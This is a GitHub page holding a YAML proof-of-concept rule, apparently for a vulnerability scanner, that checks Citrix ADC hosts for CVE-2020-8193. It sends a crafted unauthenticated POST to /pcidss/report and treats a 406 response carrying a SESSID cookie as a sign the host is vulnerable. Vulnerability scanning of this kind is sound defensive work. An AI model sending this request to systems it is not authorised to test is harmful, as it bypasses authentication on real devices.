-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2020-8193.yml
25 lines (25 loc) · 971 Bytes
/
CVE-2020-8193.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
name: poc-yaml-citrix-cve-2020-8193-unauthorized
manual: true
transport: http
set:
user: randomLowercase(8)
pass: randomLowercase(8)
rules:
r0:
request:
cache: true
method: POST
path: /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
headers:
Content-Type: application/xml
X-NITRO-PASS: '{{pass}}'
X-NITRO-USER: '{{user}}'
body: <appfwprofile><login></login></appfwprofile>
follow_redirects: false
expression: response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
expression: r0()
detail:
author: bufsnake(https://github.com/bufsnake)
links:
- https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
- https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html